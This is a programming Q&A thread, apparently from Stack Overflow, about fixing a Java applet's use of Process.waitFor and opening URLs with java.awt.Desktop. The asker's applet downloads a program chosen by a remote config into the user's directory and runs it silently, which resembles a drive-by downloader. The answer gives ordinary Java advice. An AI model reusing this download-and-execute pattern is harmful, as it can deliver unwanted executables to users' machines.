# adding p.waitFor();

Tags: java, applet

I get a 16 bit MS-DOS Subsystem error saying "Error while setting up environment for the application. Choose 'Close' to terminate the application." when I'm trying to run a java applet that is supposed to download a program.

This is the source code:

```
if(getConfig(mainURL+configs).contains("1") || getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){
            String fname = "\\"+getConfigArray(mainURL+filess).get(0);


            String fpath = userdir.concat(fname);


            final String locationDownload = getConfigArray(mainURL+urlss).get(0);

            download(locationDownload, fpath);

            final Runtime run = Runtime.getRuntime();
            p.waitFor();


            try {
                run.exec(fpath);

            } catch (final IOException e) {
            }
            }
```

I read that I can get rid of this when adding the line p.waitFor();
But I don't know where to add it, because when I try adding it I get "cannot find symbol" error when compiling.

Any help is much appreciated, thanks in forward :)

Answer (score 1):

Well what exactly is your p variable? Usually you call waitFor() on a Process object, and this may be obtained from the object returned by your Runtime's exec(...) method call.

If you want to call `waitFor()`, then do it on the proper object, the Process object:

```
  final Runtime run = Runtime.getRuntime();
  // p.waitFor();

  try {
     String fpath = "";
     Process p = run.exec(fpath);
     int result = p.waitFor(); // **** add this here
     // test result here. It should be 0 if the process terminates OK.
  } catch (final IOException e) {
     e.printStackTrace();
  } catch (InterruptedException e) {
     e.printStackTrace();
  }
```

Also, you don't want to ignore IOExceptions. At least output the stacktrace.

Finally, I don't know if this will solve your overall problem, but it should at least allow you to test waitFor to see if it will help. Understand that this method *is* blocking.

**Edit**
You asked:

> but with run.exec I can excecute a program or a specific browser, but not a URL?

That is correct since as you know URL's are not "executable" programs in their own right, and in fact are meaningless except when given to a browser. You must run the browser with the URL, but there is a way to do that by using the Desktop object (for java 1.6 and higher). Something like this could work, *if Desktop is supported on your platform*:

```
java.awt.Desktop desktop = java.awt.Desktop.getDesktop();
if( !desktop.isSupported( java.awt.Desktop.Action.BROWSE ) ) {
   // warn user that this is not going to work.
} else {
   try {
     java.net.URI uri = new java.net.URI(uriPath);
     desktop.browse(uri);
   } catch (IOException e ) {
     e.printStackTrace();
   } catch (URISyntaxException e) {
     e.printStackTrace();
   }
}
```

Comment: Thanks, but with run.exec I can excecute a program or a specific browser, but not a URL?

Comment: @Perulo: That is correct since as you know URL's are not "executable" programs in their own right, and in fact are meaningless except when given to a browser. You must run the browser with the URL, but there is a way to do that. Please see edit.